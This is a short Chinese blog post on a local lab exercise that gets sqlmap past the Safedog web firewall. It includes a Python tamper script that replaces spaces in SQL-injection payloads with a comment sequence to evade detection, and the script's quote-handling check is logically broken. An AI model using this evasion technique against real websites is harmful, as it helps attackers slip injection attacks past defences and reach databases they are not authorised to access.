sqlmap过狗脚本练习1
本地搭建sql注入网站练习
?
测试安全狗,输入不合法参数被安全狗拦截:
?
使用sqlmap:
?
?
检测到防护机制,失败;
先手工尝试绕过安全狗:
?
将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;
写个sqlmap脚本:
#demo.py
def tamper(payload,**kwargs):
retVal = payload
quote=False
if payload:
retVal = ‘‘
for i in payload:
if i =="‘" and i==‘"‘:
quote = not quote
elif i.isspace() and not quote:
retVal+=‘/*//\*//\*\/c*/‘
else:
retVal+=i
return retVal加上脚本继续跑:
?
?
成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)
相关推荐
tanrong 2019-12-16
zyjj 2020-07-04
bluet00 2020-06-25
godfather 2020-06-13
lt云飞扬gt 2020-06-09
旗木卡卡西 2020-06-02
liuyang000 2020-03-05
xuanlvhaoshao 2020-02-21
ItBJLan 2020-02-20
tanrong 2020-02-15
gwn00 2020-02-01
一对儿程序猿 2020-01-18
xuanlvhaoshao 2020-01-02
gwn00 2020-01-09
tanrong 2019-12-22
一对儿程序猿 2019-11-10
YFCEMBEDD 2019-11-09